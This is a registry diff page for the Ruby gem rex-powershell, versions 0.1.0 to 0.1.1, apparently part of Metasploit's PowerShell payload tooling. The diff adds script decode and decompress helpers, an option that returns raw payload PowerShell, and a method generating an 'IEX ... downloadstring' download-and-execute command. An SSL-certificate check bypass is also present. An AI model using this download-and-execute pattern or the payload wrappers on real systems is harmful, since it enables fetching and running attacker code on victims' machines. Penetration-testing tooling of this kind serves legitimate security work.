rex-powershell 0.1.0 → 0.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (9) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +1 -1
  4. data/lib/rex/powershell/command.rb +29 -2
  5. data/lib/rex/powershell/psh_methods.rb +11 -1
  6. data/lib/rex/powershell/script.rb +1 -0
  7. data/lib/rex/powershell/version.rb +1 -1
  8. metadata +2 -2
  9. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 6e804aa77f3457dbd23306effacfe287a50a3c18
4
- data.tar.gz: a270712dba4ac88432abc0755a14ba92b757820b
3
+ metadata.gz: 152b98e69abd262c6e3c3f9a1e5f3f54c5951ee7
4
+ data.tar.gz: 250ae1eebcbf277c2b31c9b8d2479ef66c50a9ca
5
5
  SHA512:
6
- metadata.gz: 874849a04f6e9d63adf92c90c2386aafab036ca6589eefe4a86da82bf8b6fd03c79932bf4e89c65f6b52dd2e2162dfcc3db1fb61b84c02843357a6b0bc6c8483
7
- data.tar.gz: e4643295020c14d26f18d12eb8a3b1ecf436eb41e2f662c5f703875782a4984ae3b3afa9dffa978ea8173226e61d611a85cacc27cdde31af4bc51a5760aa9eb8
6
+ metadata.gz: c7007b550fbf79e2f75060a0cab182b2e5f146c795710ce1785ece6371a3c920b496e5ea09e98fc4ab5e52ec5b6d1417bb7347ff47ee1361bc918a686fb62e71
7
+ data.tar.gz: 95cd36fe4558132a199060562588cc528a1c467939872582b2d0831550b05c8c2cdc6119de3173cb83552264e44e4a13036e17a45bba345d11752050774b52c1
checksums.yaml.gz.sig CHANGED
Binary file
data.tar.gz.sig CHANGED
@@ -1 +1 @@
1
- .ݞ��=��
1
+ EW�x�_�.dz
data/lib/rex/powershell/command.rb CHANGED
@@ -25,6 +25,16 @@ module Command
25
25
  psh.encode_code(eof)
26
26
  end
27
27
 
28
+ #
29
+ # Return the ASCII contents of the base64 encoded script
30
+ #
31
+ # @param script_in [String] Encoded script
32
+ #
33
+ # @return [String] Decoded script
34
+ def self.decode_script(script_in)
35
+ Rex::Powershell::Script.new(script_in).decode_code
36
+ end
37
+
28
38
  #
29
39
  # Return a gzip compressed powershell script
30
40
  # Will invoke PSH modifiers as enabled
@@ -48,6 +58,16 @@ module Command
48
58
  psh.compress_code(eof)
49
59
  end
50
60
 
61
+ #
62
+ # Return the ASCII contents of the GZIP/Deflate compressed script
63
+ #
64
+ # @param script_in [String] Compressed script
65
+ #
66
+ # @return [String] Decompressed script
67
+ def self.decompress_script(script_in)
68
+ Rex::Powershell::Script.new(script_in).decompress_code
69
+ end
70
+
51
71
  #
52
72
  # Generate a powershell command line, options are passed on to
53
73
  # generate_psh_args
@@ -248,6 +268,9 @@ EOS
248
268
  # environment variable at the start of the command line
249
269
  # @option opts [Boolean] :use_single_quotes Wraps the -Command
250
270
  # argument in single quotes unless :encode_final_payload
271
+ # @option opts [TrueClass,FalseClass] :exec_in_place Removes the
272
+ # executable wrappers from the powershell code returning raw PSH
273
+ # for executing with an existing PSH context
251
274
  #
252
275
  # @return [String] Powershell command line with payload
253
276
  def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
@@ -340,9 +363,13 @@ EOS
340
363
  command_args[:command] = final_payload
341
364
  end
342
365
 
343
- psh_command = generate_psh_command_line(command_args)
366
+ if opts[:exec_in_place]
367
+ psh_command = "#{command_args[:command]}"
368
+ else
369
+ psh_command = generate_psh_command_line(command_args)
370
+ end
344
371
 
345
- if opts[:remove_comspec]
372
+ if opts[:remove_comspec] or opts[:exec_in_place]
346
373
  command = psh_command
347
374
  else
348
375
  command = "%COMSPEC% /b /c start /b /min #{psh_command}"
data/lib/rex/powershell/psh_methods.rb CHANGED
@@ -70,7 +70,17 @@ module Powershell
70
70
  # @return [String] Powershell code to disable SSL verification
71
71
  # checks.
72
72
  def self.ignore_ssl_certificate
73
- '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
73
+ '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}'
74
+ end
75
+
76
+ #
77
+ # Download and execute string via HTTP
78
+ #
79
+ # @param url [String] string to download
80
+ #
81
+ # @return [String] PowerShell code to download and exec the url
82
+ def self.download_and_exec_string(url)
83
+ %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
74
84
  end
75
85
 
76
86
  #
data/lib/rex/powershell/script.rb CHANGED
@@ -1,5 +1,6 @@
1
1
  # -*- coding: binary -*-
2
2
 
3
+
3
4
  require 'forwardable'
4
5
 
5
6
  module Rex
data/lib/rex/powershell/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.0"
3
+ VERSION = "0.1.1"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.0
4
+ version: 0.1.1
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
@@ -85,7 +85,7 @@ cert_chain:
85
85
  2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
86
86
  QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
87
87
  -----END CERTIFICATE-----
88
- date: 2016-06-21 00:00:00.000000000 Z
88
+ date: 2016-07-15 00:00:00.000000000 Z
89
89
  dependencies:
90
90
  - !ruby/object:Gem::Dependency
91
91
  name: bundler
metadata.gz.sig CHANGED
Binary file